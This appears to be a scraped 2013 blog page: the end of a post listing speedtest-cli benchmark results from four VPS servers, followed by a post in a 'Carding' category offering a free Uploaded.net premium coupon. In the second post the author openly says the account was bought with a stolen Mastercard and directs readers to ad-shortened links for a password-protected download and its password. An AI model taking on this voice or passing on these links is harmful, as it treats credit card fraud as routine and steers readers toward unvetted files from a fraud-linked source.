Download: 26.79 Mbit/s
Testing upload speed..................................................
Upload: 7.31 Mbit/s
Share results: http://www.speedtest.net/result/2849887629.png

# VPS 2 (SINGAPORE)
root@host [~]# python speedtest-cli.py --server=1777 --share
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from Amazon.com (xxx.xxx.xxx.xxx)...
Hosted by Comcast (Memphis, TN) [15712.71 km]: 31.63 ms
Testing download speed........................................
Download: 42.37 Mbit/s
Testing upload speed..................................................
Upload: 6.98 Mbit/s
Share results: http://www.speedtest.net/result/2849897992.png

# VPS 3 (IRELAND)
root@server [~]# python *.py --share --server=1716
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from Amazon Data Services Ireland Ltd (xxx.xxx.xxx.xxx)...
Hosted by FL High Speed Internet (Cocoa, FL) [16673.24 km]: 42.597 ms
Testing download speed........................................
Download: 16.01 Mbit/s
Testing upload speed..................................................
Upload: 6.06 Mbit/s
Share results: http://www.speedtest.net/result/2849902734.png

# VPS 4 (USA)
root@host:/usr/local/src# python *.py --share --server=2604
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from Amazon.com (xxx.xxx.xxx.xxx)...
Hosted by Telstra (Brisbane) [15209.56 km]: 48.955 ms
Testing download speed........................................
Download: 28.91 Mbit/s
Testing upload speed..................................................
Upload: 5.81 Mbit/s
Share results: http://www.speedtest.net/result/2849907488.png

Hope it helps.. thanks for reading.

Download Free Uploaded.net Coupon (3 Months Premium Membership)

Posted in Anything, Carding, File Hosting, File Sharing, Free Premium Coupon by franx47 on June 17, 2013

Hello friend,

Howdy? Hope everything is okay out there.

So, here I’ve just bought a premium account at Uploaded.net (with stolen credit card – Mastercard). It is a 2 years premium account with price 99.99 Eur ($133.99 USD), enough for me to upload and host any files online for the next 2 years. It has more than 500 GB download traffic, and more than 10 GB for backup space.

And like always, I got bonus that is Uploaded.net premium coupon, for 3 months premium membership.

You can download here:

http://q.gs/3475036/download-uploadednet-coupon-june-2013

# File is password protected, download first the password here to unlock:

http://q.gs/3475036/download-password-uploadednet-coupon-jun

The Coupon code is valid for 14 days and may be redeemed by any free-user at http://ul.to/coupon.

Enjoy and have a nice day, friend.

Follow

Get every new post delivered to your Inbox.

Join 111 other followers